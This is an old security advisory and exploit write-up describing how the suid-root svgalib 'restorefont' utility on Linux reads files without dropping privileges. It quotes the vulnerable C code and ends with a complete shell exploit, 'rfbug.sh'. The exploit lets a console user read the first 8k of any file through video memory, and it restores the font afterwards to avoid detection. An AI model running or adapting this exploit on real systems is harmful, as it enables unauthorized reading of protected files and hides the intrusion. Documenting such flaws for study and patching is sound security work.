Linux 'restorefont' Security Holes
                             by FEH Staff

   Linux's svgalib utilities, required to be suid root, have a problem in that
they do not revoke suid permissions before reading a file.  This is exploited
in the restorefont utility, but similar bugs exist in other svgalib utilities.
The restorefont utility serves two functions.  First, it will read a font from
a file and write it to the console as the font.  Second, it will read a font
from the console and write it out to a file.  Luckily, the specific bug
in restorefont can only be exploited if someone is at the console, reducing
its overall impact on the security of the system as a whole.
   In writing the utilities, the authors are cognizant of the fact that when
writing out the font, suid permissions must first be given up; it is in fact
commented as such in the code.  However, when reading in a font, the program
is still running with full suid root permissions.  This allows us to read in
any file for the font that root could access (basically, anything).
   The applicable code to read in the file is shown below:

#define FONT_SIZE 8192
unsigned char font[FONT_SIZE];

        if (argv[1][1] == 'r') {
                FILE *f;
                f = fopen(argv[2], "rb");
                if (f == NULL) {
                        error:
                        perror("restorefont");
                        exit(1);
                }
                if(1!=fread(font, FONT_SIZE, 1, f))
                        {
                        if(errno)
                                goto error;
                        puts("restorefont: input file corrupted.");
                        exit(1);
                        }
                fclose(f);

   We can see from this that the file to be read in has to be at least 8k,
as if it is not, the program will produce an error and exit.  If the file
is at least 8k, the first 8k are read into the buffer, and the program
proceeds to set whatever the contents of the file are to the font:
        vga_disabledriverreport();
        vga_setchipset(VGA);            /* avoid SVGA detection */
        vga_init();
        vga_setmode(G640x350x16);
        vga_puttextfont(font);
        vga_setmode(TEXT);

   At this point, the console will now look quite unreadable if you are
reading something other than a font from that file.  But, the data that
is put into the font is left untouched and is readable using the -w option
of restorefont.  We then read the font back from video memory to a new file,
and our job is complete, we have read the first 8k of a file we shouldn't
have had access to.  To prevent detection of having run this, we probably
shouldn't leave an unreadable font on the screen, so we save and then restore
the original font before reading from the file.
    The complete exploit is shown below:

                   Program: restorefont, a svgalib utility
Affected Operating Systems: linux
              Requirements: logged in at console
       Security Compromise: user can read first 8k of any file of at least
                            8k in size on local filesystems
                  Synopsis: restorefont reads a font file while suid root,
                            writing it to video memory as the current vga
                            font; anyone at console can read the current
                            font to a file, allowing you to use video memory
                            as an 8k file buffer.

rfbug.sh:
#!/bin/sh
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp